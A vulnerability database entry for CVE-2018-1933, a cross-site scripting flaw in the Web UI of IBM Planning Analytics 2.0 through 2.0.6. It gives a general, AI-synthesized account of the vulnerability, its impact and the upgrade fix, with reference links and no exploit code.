CVE-2018-1933
Description
IBM Planning Analytics 2.0 through 2.0.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 153177.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
IBM Planning Analytics 2.0 through 2.0.6 is vulnerable to stored cross-site scripting in the Web UI, allowing credentials disclosure.
Vulnerability
IBM Planning Analytics versions 2.0 through 2.0.6 are vulnerable to cross-site scripting (XSS) via the Web UI. The vulnerability resides in the dojo create_widgets.html component (part of the Dojo Toolkit used by PMHub) [1]. User-supplied input is not properly sanitized, allowing attackers to embed arbitrary JavaScript code that executes in the context of a trusted session.
Exploitation
An attacker requires no special network position beyond being able to submit crafted input to the affected Web UI component. The attacker must have a valid user account with access to the Planning Analytics interface [1]. The exploitation steps involve injecting malicious script into input fields that are later rendered in a victim's browser without proper encoding, leading to execution of the attacker's code when the victim views the affected page.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session. This can lead to credentials disclosure, session hijacking, or other actions that the authenticated user could perform, potentially compromising the integrity and confidentiality of the Planning Analytics instance [1].
Mitigation
IBM Planning Analytics version 2.0.7, released in conjunction with the associated security bulletin, addresses this vulnerability [1]. Users should upgrade to 2.0.7 or later. No workaround beyond upgrading is documented in the provided references [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: >=2.0, <=2.0.6
- Range: 2.0.3
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3- www.ibm.com/support/docview.wssmitrex_refsource_CONFIRM
- www.securityfocus.com/bid/108191mitrevdb-entryx_refsource_BID
- exchange.xforce.ibmcloud.com/vulnerabilities/153177mitrevdb-entryx_refsource_XF
News mentions
0No linked articles in our index yet.